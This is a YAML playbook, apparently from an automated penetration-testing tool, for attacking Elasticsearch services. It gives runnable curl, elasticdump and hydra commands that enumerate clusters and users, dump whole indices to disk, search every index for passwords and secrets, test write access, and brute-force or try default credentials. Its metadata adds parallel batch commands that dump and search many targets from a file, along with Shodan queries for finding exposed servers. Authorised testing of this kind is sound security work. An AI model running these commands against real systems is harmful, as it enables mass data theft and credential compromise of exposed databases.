id: elasticsearch_pentesting
name: Elasticsearch Penetration Testing (Port 9200)
description: Comprehensive Elasticsearch enumeration, index dumping, and data extraction based on HackTricks methodology
category: enumeration
risk_level: high
batch_compatible: true

triggers:
  - id: trigger_elasticsearch_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [9200, 9300] }
      protocol: { "$in": ["http", "elasticsearch", "tcp"] }
    required_count: 1
    priority: 6
    description: Triggers when Elasticsearch service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: elasticsearch_banner_grab
    name: Elasticsearch Banner Grabbing
    description: Identify Elasticsearch version and cluster information
    order: 1
    timeout_seconds: 60
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/'"
        preferred: true
        notes: "Get Elasticsearch version, cluster name, and build info"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p {port} --script http-title {host}"
        preferred: false
        notes: "Nmap service detection"
        requires_elevation: false

  - id: elasticsearch_auth_check
    name: Elasticsearch Authentication Check
    description: Verify if authentication is enabled
    order: 2
    timeout_seconds: 60
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_xpack/security/user'"
        preferred: true
        notes: "Check if X-Pack security is enabled (error = disabled)"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -u {username}:{password} -X GET 'http://{host}:{port}/'"
        preferred: false
        notes: "Test with credentials if auth is enabled"
        requires_elevation: false

  - id: elasticsearch_cluster_info
    name: Elasticsearch Cluster Information
    description: Enumerate cluster health and node information
    order: 3
    timeout_seconds: 120
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_cluster/health?pretty=true'"
        preferred: true
        notes: "Get cluster health status"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_cluster/state?pretty=true'"
        preferred: true
        notes: "Get complete cluster state information"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_cluster/stats?pretty=true'"
        preferred: false
        notes: "Get cluster-wide statistics"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_nodes?pretty=true'"
        preferred: false
        notes: "Enumerate all nodes in the cluster"
        requires_elevation: false

  - id: elasticsearch_user_enumeration
    name: Elasticsearch User and Role Enumeration
    description: List users, roles, and permissions
    order: 4
    timeout_seconds: 120
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_security/user?pretty=true'"
        preferred: true
        notes: "List all users (if auth enabled)"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_security/role?pretty=true'"
        preferred: true
        notes: "List all roles and permissions"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_security/role_mapping?pretty=true'"
        preferred: false
        notes: "Get role mapping information"
        requires_elevation: false

  - id: elasticsearch_index_enumeration
    name: Elasticsearch Index Enumeration
    description: List all indices and their metadata
    order: 5
    timeout_seconds: 120
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_cat/indices?v'"
        preferred: true
        notes: "List all indices with health, status, and doc count"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_cat/indices?v&s=docs.count:desc'"
        preferred: true
        notes: "List indices sorted by document count"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_cat/aliases?v'"
        preferred: false
        notes: "List index aliases"
        requires_elevation: false

  - id: elasticsearch_index_mapping
    name: Elasticsearch Index Mapping and Schema
    description: Get field structure and data types for indices
    order: 6
    timeout_seconds: 120
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/{index}/?pretty=true'"
        preferred: true
        notes: "Get detailed index information and mapping"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/{index}/_mapping?pretty=true'"
        preferred: false
        notes: "Get index field mappings and types"
        requires_elevation: false

  - id: elasticsearch_data_extraction
    name: Elasticsearch Data Extraction (Index Dumping)
    description: Dump all documents from indices
    order: 7
    timeout_seconds: 600
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/{index}/_search?pretty=true&size=10000' -o {index}_dump.json"
        preferred: true
        notes: "Dump all documents from an index (adjust size parameter)"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_search?pretty=true&size=10000' -o all_indices_dump.json"
        preferred: true
        notes: "Dump documents from all indices"
        requires_elevation: false
      - tool: elasticdump
        platforms: [linux, macos, windows]
        command: "elasticdump --input=http://{host}:{port}/{index} --output={index}.json --type=data"
        preferred: false
        notes: "Export index data using elasticdump tool"
        requires_elevation: false

  - id: elasticsearch_search
    name: Elasticsearch Content Search
    description: Search for sensitive data across all indices
    order: 8
    timeout_seconds: 300
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_search?pretty=true&q=password'"
        preferred: true
        notes: "Search for 'password' across all indices"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/_search?pretty=true&q=secret'"
        preferred: true
        notes: "Search for 'secret' across all indices"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X GET 'http://{host}:{port}/{index}/_search?pretty=true&q={search_term}'"
        preferred: false
        notes: "Search specific index for a term (supports regex)"
        requires_elevation: false

  - id: elasticsearch_write_test
    name: Elasticsearch Write Permission Test
    description: Test if we can create indices and insert documents
    order: 9
    timeout_seconds: 120
    commands:
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X POST 'http://{host}:{port}/testindex/testdoc' -H 'Content-Type: application/json' -d '{\"test\": \"data\"}'"
        preferred: true
        notes: "Attempt to create a test document in a new index"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -X DELETE 'http://{host}:{port}/testindex'"
        preferred: false
        notes: "Clean up test index if write succeeded"
        requires_elevation: false

  - id: elasticsearch_brute_force
    name: Elasticsearch Authentication Brute Force
    description: Brute force Elasticsearch credentials
    order: 10
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L users.txt -P passwords.txt {host} http-get :{port}/"
        preferred: true
        notes: "Brute force HTTP basic auth (common users: elastic, kibana)"
        requires_elevation: false
      - tool: curl
        platforms: [linux, macos, windows]
        command: "curl -u elastic:changeme -X GET 'http://{host}:{port}/'"
        preferred: false
        notes: "Test default credentials (elastic:changeme on older versions)"
        requires_elevation: false

metadata:
  tools:
    - curl
    - nmap
    - elasticdump
    - hydra
    - horuz
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/9200-pentesting-elasticsearch
    - https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html
    - https://github.com/misalabs/horuz
  techniques:
    - Unauthenticated access exploitation
    - Cluster information disclosure
    - Index enumeration and mapping
    - Data exfiltration (bulk dumping)
    - Content search across indices
    - User and role enumeration
    - Write permission testing
    - Default credential testing
  batch_commands:
    enum_indices: "parallel -j 10 'curl -s http://{}:9200/_cat/indices?v' :::: {targets_file}"
    dump_all: "parallel -j 5 'curl -X GET http://{}:9200/_search?size=10000 -o {}.json' :::: {targets_file}"
    search_secrets: "parallel -j 10 'curl -s http://{}:9200/_search?q=password' :::: {targets_file}"
  notes: |
    Elasticsearch is a distributed search and analytics engine often misconfigured.

    DEFAULT CONFIGURATION:
    - No authentication by default (X-Pack security disabled)
    - Binds to 0.0.0.0 in Docker/cloud deployments
    - Port 9200 (HTTP API), 9300 (transport protocol)

    AUTHENTICATION:
    - X-Pack security must be explicitly enabled
    - Default users: elastic (superuser), kibana, logstash_system, beats_system
    - Older versions default password: "changeme"
    - HTTP Basic Authentication when enabled

    API ENDPOINTS (unauthorized access):
    - / - Banner with version info
    - /_cat/indices - List all indices
    - /_cluster/health - Cluster status
    - /_cluster/state - Complete cluster configuration
    - /_nodes - Node information
    - /_search - Global search across all indices
    - /{index}/_search - Search specific index
    - /_security/user - List users (if auth enabled)
    - /_security/role - List roles and permissions

    INDEX STRUCTURE:
    - Indices contain documents (like tables contain rows)
    - Each document is JSON with fields and values
    - Mapping defines field types (string, date, number, etc.)
    - Default result limit: 10 documents (use size parameter)

    DATA EXTRACTION:
    - Small datasets: curl with ?size=10000 parameter
    - Large datasets: elasticdump tool or scroll API
    - Search supports regex: /_search?q=password.*
    - Can dump all indices at once: /_search?size=10000

    COMMON SENSITIVE DATA:
    - Application logs with credentials
    - User PII in search indices
    - API keys and tokens
    - Database connection strings
    - Session tokens and cookies

    SHODAN QUERIES:
    - port:9200 elasticsearch
    - "elastic indices"

    WRITE ACCESS IMPLICATIONS:
    - Can plant malicious documents
    - Can modify search results
    - Can overwrite legitimate data
    - Can delete indices (DoS)

    KIBANA INTEGRATION:
    - Often runs on port 5601
    - Shares Elasticsearch backend
    - May expose additional attack surface
    - Can execute Elasticsearch queries via UI
